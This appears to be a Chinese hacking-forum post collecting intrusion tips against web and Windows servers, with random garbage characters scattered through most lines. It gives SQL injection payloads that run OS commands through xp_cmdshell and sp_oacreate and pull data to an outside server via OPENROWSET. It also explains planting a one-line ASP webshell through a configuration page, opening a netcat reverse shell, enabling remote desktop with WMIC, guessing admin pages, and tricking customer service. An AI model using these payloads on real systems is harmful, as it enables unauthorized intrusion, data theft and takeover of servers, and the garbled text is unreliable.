SA点数据库分离技术相关* \; y8 y" S$ S y8 P! E% K: D
w* h/ U! X9 k$ S( A6 c* M, t0 z& Z
SA点数据库分离搞法+语句:# t; W, ^! n5 P) p' E4 b7 N
3 v" M' z+ W1 G0 q+ q注射点不显错,执行下面三条语句页面都返回正常。
! }2 d2 K* Y# [$ s& H0 r) |and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
! Z' b. ?0 x& A9 s5 B' v2 sand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'): W; u1 S! }, ~: r- g& J
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
3 G" }4 K6 @# t9 e. O可以列目录,判断系统为2000,web与数据库分离 L, e6 N5 H3 R. N1 O
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
) E$ O4 G6 [- S% I: Q在注射点上执行' l5 ?' E g& H' s4 e' b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--( G+ U9 V6 }( P1 `6 i# X1 {
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP9 H* ]+ b. d, g6 o" |6 y/ V* R
还有我用NC监听得其他端口都没有得到IP。6 A, @. I# j* C5 f0 o9 t& ?
9 e6 ~; C; @. b2 N' [5 ?& @# I通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。2 ^8 X* K- X1 M" G8 w/ i8 I: d
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--! K- e2 `7 H L2 d4 _! s( s1 m" E' {
# P1 t. r- Q) ~: g' Y;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
7 U+ p J5 G- m; O8 d/ q* n4 f9 u! H( j! {: o
现在就猜想是不是数据库是内网而且不能连外网。
% \$ o! W: B1 M+ j3 w d% M
7 ~/ s: d' B* z$ ?. X( L8 t% K& l3 L& e+ [9 c$ k
access导出txt文本代码
( n- g$ A6 b0 K& w2 iSELECT * into [test.txt] in 'd:\web\' 'text;' from admin+ \& P/ Q, ^4 K, {: g
2 R j8 j4 [3 q [4 s+ Y$ D: X
( e+ @- ~7 B0 ^- L5 @/ ?
" D: o5 M' N( g* _- L5 K自动跳转到指定网站代码头# e+ B( V3 P7 I4 v O
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
% |4 k" K7 l' }$ l0 _# \; } a0 t8 X6 C' z0 z9 C' l& Y( C
) U. j) C1 R( n入侵java or jsp站点时默认配置文件路径:0 B. ^ W* w# P% C& M/ j8 c2 W* `
\web-inf\web.xml
2 X- \. o ^; b3 e, v2 ktomcat下的配置文件位置:
# } N4 D2 Z# D4 k+ z) X\conf\server.xml (前面加上tomcat路径)9 o- \1 h! c/ b( E1 t/ [
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
) R' U- A" K/ y' ~' M1 L5 ~4 N3 [4 K4 p1 c; Y1 ?
+ _5 ~; [# b$ T0 G/ x" x: G
) J x k( ]2 H2 B: J: ^
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果: Z/ p4 P, \" n+ O1 D. ?
-1%23
( d8 W# b) r/ \" z3 V. ?> : v- r' z; T4 d1 e3 P7 m, M% s, z6 r* ?
<) T+ A& T* V; l: c+ K
1'+or+'1'='1# L: r( z3 n. ^1 x6 R2 q2 T
id=8%bf9 L! t. b5 v9 R8 d z" I; \
5 d% b4 ] t) w# I$ ?& x u% s; m N
全新注入点检测试法:0 A2 K- I, X2 M) R5 a1 E. h* Z
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。7 u3 }& t5 [, }' C5 V3 u4 k
+ {& K6 X. N; L2 ?$ k
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。( i. B6 w0 H" P/ G& @0 k: B
" O9 U* X( h9 ^8 k2 b& l$ D
搜索型注入判断方法:
" m1 l9 f$ A' t8 h. T7 Y5 a* \北京%' and '1'='1' and '%'='
1 ?9 a4 P! T Q+ q: y' K: \; P北京%' and '1'='2' and '%'='
: E1 ?/ M1 j" E# v0 d
5 X* _6 R% ]8 Z" b6 C6 O0 c2 |, {
, I' f4 s- v5 c- x; E- g- UCOOKIES注入:( X8 U+ K z2 H/ S$ ]- v
. [' {3 F, ~3 D! \% T qjavascript:alert(document.cookie="id="+escape("51 and 1=1"));6 n8 o- F8 \! o$ `- k3 v1 i& L
% z2 u. f1 g- V5 [2 @
2000专业版查看本地登录用户命令:* K6 V. s. i& e" E( u2 ?( r
net config workstation
' g s& s0 I" Y5 z
& ~( U$ a% j! g0 a8 S, j B7 E+ I/ ~+ _
2003下查看ipsec配置和默认防火墙配置命令:
/ F+ Z0 V: x5 x2 g, e- ~netsh firewall show config
7 O9 j1 c. i: Y$ k+ ~) N# A ?netsh ipsec static show all( |. F8 R" u6 U9 M
! H; y& u8 L6 X4 Z' h
不指派指定策略命令:
" z* n+ A3 m) B5 p9 o8 u9 ]netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
3 B# T5 H7 h# b) G4 snetsh ipsec static show policy all 显示策略名 Y# ~" d% U: e) h
9 O- z& V) e( K
% K7 P7 G& A' N, w猜管理员后台小技巧:* H- S/ x4 d0 S5 O( e- l) x: V
admin/left.asp L- n4 W9 T. w& p+ k
admin/main.asp' O4 y5 t+ f6 H0 A+ w
admin/top.asp/ F4 x& D. }+ o' C* O" i
admin/admin.asp ( u; [$ b0 {- m G. y+ S
会现出菜单导航,然后迅雷下载全部链接
, R- ]: E. X( j1 G1 }6 q+ `: w' k, X7 v# g/ o! u
% ^) \2 ?( [$ C& `; P. W社会工程学:
* T: T4 w3 i8 O; v1 A: x2 G用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人1 |8 i7 c9 k; b" O/ j
然后去骗客服
6 ]/ L' B/ C A1 o/ k1 y
7 r7 n. E( r" Z; i: w1 k1 l* u3 n \$ K5 @3 }0 W/ Q
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ! b7 r: y, P5 z6 G' j
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 9 u0 @6 O8 S$ i) O1 }. C! \" _! Y
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
* e$ n1 R. ~- }: k4 M" D/ S' Z' [- _& c, S
- u) n4 s. Z5 w( B* J
1 A9 q) `! c$ O) N$ n6 T4 [7 X8 {( u6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
2 I" g9 h, Z& ^
+ P4 M+ {5 k( J% H, J; d( N) X: S$ z- e& A
2 ]$ P9 {& Q$ N' H! `( N7 WCMD加密注册表位置
1 |9 l) q% N6 [) y(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
& Y( t& S' i, ] \ a5 K3 fAutoRun
* k: Q* D# e6 G% U. @4 C* f. q; U" |
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
. c7 b# Q' `+ uAutoRun7 `# p! p5 N6 k) T) K U# O( Y
1 ?* j% a# s6 G- C0 l& M( L- n7 a% p3 u5 r* w
在找注入时搜索Hidden,把他改成test3 U; N0 v( \* N# W& O% @* E0 }
* ~" `" B/ ^; L& w4 ^
# m- M, q+ d9 ?: _" x
+ V! M5 [) N# amstsc /v:IP /console # c2 t& e% n2 Q% ~) ?
2 m, o$ K% O7 c
) z' T0 A; H Q1 L0 r8 s9 e一句话开3389:
) Y/ W$ j' H" m& a( G, ?. T/ H7 v" q# y, |+ Z
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
' P! I7 o: Q, |) p开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( g" r( y6 }5 P5 G* s
0 f8 R, @. }5 O# p& Y2 X' Q1 [- \3 z' U7 q
* |5 |/ M1 d1 ~# y6 W知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
, T; {9 }7 e1 b9 V, a" }0 _# KInsert into admin(user,pwd) values('test','test')
4 V, W! }5 {. q" x# ~4 b- u+ p) F2 D ?& T. U
" H) T2 C4 m* ^$ F* h# H" ^8 V
NC反弹1 i( M2 b; u1 u! F( @3 i0 j
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
/ g" h/ U7 ?2 U; L1 H+ ?+ A( d! [! m* {然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
+ k: c7 }* L2 k% I" x8 p+ S- H2 P. {3 N. T
) e# E! Y7 |: Y1 {在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
$ A0 L6 |. o% |* e) S8 I$ i& a7 A" V) W) [
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录* Y K( \: m/ p h" @' h
例如:& |# ?7 ]0 E8 [( A; f- ?: C% Q
subst k: d:\www\ 用d盘www目录替代k盘3 O4 ^9 H) [3 n. P& W# }2 b
subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对